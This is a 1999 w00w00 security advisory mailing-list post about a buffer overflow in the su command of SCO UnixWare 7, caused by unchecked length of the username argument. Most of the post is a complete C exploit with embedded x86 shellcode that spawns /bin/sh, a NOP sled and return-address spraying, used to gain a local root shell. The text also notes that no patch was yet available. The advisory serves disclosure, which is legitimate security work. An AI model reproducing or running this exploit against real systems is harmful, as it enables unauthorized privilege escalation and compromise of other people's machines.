unixware.su.txt

`-----Original Message-----  
Date: Fri, 26 Nov 1999 04:16:41 +0300 (MSK)  
From: Matt Conover <[email protected]>  
To: [email protected]  
cc: [email protected]  
Subject: [w00giving '99 #5 and w00news]: UnixWare 7's su  
Message-ID:  
<[email protected]>  
MIME-Version: 1.0  
Content-Type: TEXT/PLAIN; charset=US-ASCII  
  
w00w00 Security Development (WSD)  
http://www.w00w00.org/advisories.html  
  
----------------------------------------------------------------------------  
Sorry, we've been really tied up these past 2-3 weeks and have been unable  
to write up the advisories. We'll send three SCO advisories tonight to  
make up for it. We should have some interesting ones within the next two  
weeks (it's really hard to find the time to write up the exploits and  
advisories).  
  
You'll noticed we jumped from #3 to #5. w00giving advisory #4 has been  
available on http://www.w00w00.org/advisories.html for 2-3 weeks, but  
it wasn't posted to this list. w00w00.org has had hits from 55 different  
countries as of yesterday.  
  
If you are going to send out advisories, please cc them to  
[email protected], also. You can subscribe to it by sending  
"subscribe news" to [email protected]. Technotronic is a good  
site and beginning now, you will always see our advisories/articles/code  
posted on there first (order of release: w00w00.org,  
[email protected], news groups, bugtraq).  
----------------------------------------------------------------------------  
  
Discovered by: K2 ([email protected])  
  
The su command on SCO's UnixWare 7 has improper bounds checking on the  
username passed (via argv[1]), which can cause a buffer overflow when  
a lengthy username is passed.  
  
----------------------------------------------------------------------------  
Exploit (by K2):  
  
// UnixWare7 /usr/bin/su local, K2, revisited Oct-30-1999  
#include <unistd.h>  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
  
char shell[] =  
"\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"  
"\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"  
"\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"  
"\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"  
"\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"  
"\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";  
  
const char x86_nop=0x90;  
long nop,esp;  
long offset=DEFOFF;  
char buffer[SIZE];  
  
long get_esp() { __asm__("movl %esp,%eax"); }  
  
int main (int argc, char *argv[])  
{  
register int i;  
  
if (argc > 1) offset += strtol(argv[1], NULL, 0);  
if (argc > 2) nop += strtoul(argv[2], NULL, 0);  
else  
nop = NOPDEF;  
esp = get_esp();  
  
memset(buffer, x86_nop, SIZE);  
memcpy(buffer+nop, shell, strlen(shell));  
  
for (i = nop+strlen(shell); i < SIZE-4; i += 4)  
*((int *) &buffer[i]) = esp+offset;  
  
printf("offset = [0x%x]\n",esp+offset);  
execl("/usr/bin/su", "su", buffer, NULL);  
  
printf("exec failed!\n");  
return 0;  
}  
  
----------------------------------------------------------------------------  
Patch:  
  
SCO is in the process of fixing a list of vulnerabilities we sent a few  
weeks ago.  
  
----------------------------------------------------------------------------  
  
  
`